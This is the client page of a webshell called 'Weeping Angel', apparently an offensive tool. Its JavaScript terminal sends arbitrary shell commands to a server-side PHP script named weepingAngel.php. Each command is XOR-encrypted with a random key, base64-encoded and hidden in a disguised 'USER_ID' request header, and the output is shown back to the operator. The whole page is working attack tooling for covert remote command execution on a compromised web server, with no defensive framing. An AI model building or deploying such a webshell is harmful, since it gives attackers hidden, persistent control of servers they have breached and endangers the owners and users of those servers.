<!DOCTYPE html>
<html>
    <head>
        <title>Weeping Angel Webshell</title>
        <script src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
        <script src="https://unpkg.com/jquery.terminal/js/jquery.terminal.min.js"></script>
        <link rel="stylesheet" href="https://unpkg.com/jquery.terminal/css/jquery.terminal.min.css"/>'
        <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>'
        <!-- HTML Terminal: https://itnext.io/how-to-create-interactive-terminal-like-website-888bb0972288 -->
    </head>
    <style>
        body {
            background-color: black;
        }
        .terminal, span {
            --size: 1.4;
        }
    </style>
    <body>
        <div>
            <script>
                    var currentPath = ".";
                    function getRandomValue() {
                        var result           = '';
                        var characters       = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
                        var charactersLength = characters.length;
                        for ( var i = 0; i < 10; i++ ) {
                            result += characters.charAt(Math.floor(Math.random() * charactersLength));
                        }
                        return result;
                    }

                    function encryptCommand(input, key) {

                        var c = '';
                        while (key.length < input.length) {
                            key += key;
                        }
                        for(var i=0; i<input.length; i++) {
                            var value1 = input[i].charCodeAt(0);
                            var value2 = key[i].charCodeAt(0);

                            var xorValue = value1 ^ value2;

                            var xorValueAsHexString = xorValue.toString("16");

                            if (xorValueAsHexString.length < 2) {
                                xorValueAsHexString = "0" + xorValueAsHexString;
                            }

                            c += xorValueAsHexString;
                        }
                        return c;
                    }

                    function sendCommand(command, terminal) {

                        // To keep track of current folder.
                        var copyCommand = command;
                        command = "cd " + currentPath + ";"+ command;
                        if (copyCommand.startsWith("cd "))
                        command = command + ";pwd";
                        
                        var key = getRandomValue();
                        var payload = "Ufejiwek"  + CryptoJS.enc.Base64.stringify(CryptoJS.enc.Utf8.parse(key + encryptCommand(command, key)))

                        var xhr = new XMLHttpRequest();
                        xhr.open("POST", "../weepingAngel.php", true); // For testing ../weepingAngel.php else ""
                        xhr.setRequestHeader("USER_ID", payload);
                        xhr.onreadystatechange = function() {
                            if (this.readyState != 4) return;

                            if (this.status == 200) {
                                var response = JSON.parse(this.responseText);
                                var outputLen = response.length;

                                // Update current path.
                                if (copyCommand.startsWith('cd ')) {
                                    outputLen = outputLen -1; // Skip last reserved output.
                                    currentPath = response[response.length -1];
                                }

                                for (var i = 0; i < outputLen; i++)
                                    terminal.echo(response[i]);
                            }
                            else {
                                terminal.echo("Webshell request failed, returned code " + this.status);
                            }
                        }
                        xhr.send();
                    }

                    $('div').terminal(function(command) {
                        switch(command) 
                        {
                        case "hello": {
                            this.echo("Hi");
                            break;
                        }
                        case "help": { 
                            this.echo("WeepingAngel WebShell 1.0\n\nhelp  ?  author  exit\nclear $(any current installed command)")
                            break;
                        }
                        case "author":  {
                            this.echo("WeepingAngel 1.0 (c) 2022 ramb0\n")
                            break;
                        }
                        case "weeping angel": {
                            this.echo($('<img src="https://cdna.artstation.com/p/assets/images/images/006/265/378/large/dedy-d-weepingangel.jpg?1497264878&dl=1">'))
                            break;
                        }
                        default: {
                            if (command == "" || command.length == 0) {
                                break;
                            }

                            sendCommand(command, this);
                            break;
                        }
                        }
                    }, {
                        greetings: 
                        " █     █▓█████▓█████ ██▓███  ██▓███▄    █  ▄████ ▄▄▄      ███▄    █  ▄████▓█████ ██▓    \n"+
                        "▓█░ █ ░█▓█   ▀▓█   ▀▓██░  ██▓██▒██ ▀█   █ ██▒ ▀█▒████▄    ██ ▀█   █ ██▒ ▀█▓█   ▀▓██▒    \n"+
                        "▒█░ █ ░█▒███  ▒███  ▓██░ ██▓▒██▓██  ▀█ ██▒██░▄▄▄▒██  ▀█▄ ▓██  ▀█ ██▒██░▄▄▄▒███  ▒██░    \n"+
                        "░█░ █ ░█▒▓█  ▄▒▓█  ▄▒██▄█▓▒ ░██▓██▒  ▐▌██░▓█  ██░██▄▄▄▄██▓██▒  ▐▌██░▓█  ██▒▓█  ▄▒██░    \n"+
                        "░░██▒██▓░▒████░▒████▒██▒ ░  ░██▒██░   ▓██░▒▓███▀▒▓█   ▓██▒██░   ▓██░▒▓███▀░▒████░██████▒\n"+
                        "░ ▓░▒ ▒ ░░ ▒░ ░░ ▒░ ▒▓▒░ ░  ░▓ ░ ▒░   ▒ ▒ ░▒   ▒ ▒▒   ▓▒█░ ▒░   ▒ ▒ ░▒   ▒░░ ▒░ ░ ▒░▓  ░\n"+
                        "  ▒ ░ ░  ░ ░  ░░ ░  ░▒ ░     ▒ ░ ░░   ░ ▒░ ░   ░  ▒   ▒▒ ░ ░░   ░ ▒░ ░   ░ ░ ░  ░ ░ ▒  ░\n"+
                        "  ░   ░    ░     ░  ░░       ▒ ░  ░   ░ ░░ ░   ░  ░   ▒     ░   ░ ░░ ░   ░   ░    ░ ░   \n"+
                        "    ░      ░  ░  ░  ░        ░          ░      ░      ░  ░        ░      ░   ░  ░   ░  ░\n"+
                        "Wahh It's the weeping angel!\n",
                        prompt: "@ngel~$ "
                                                                                                    
                    });
            </script>
        </div>
    </body>
</html>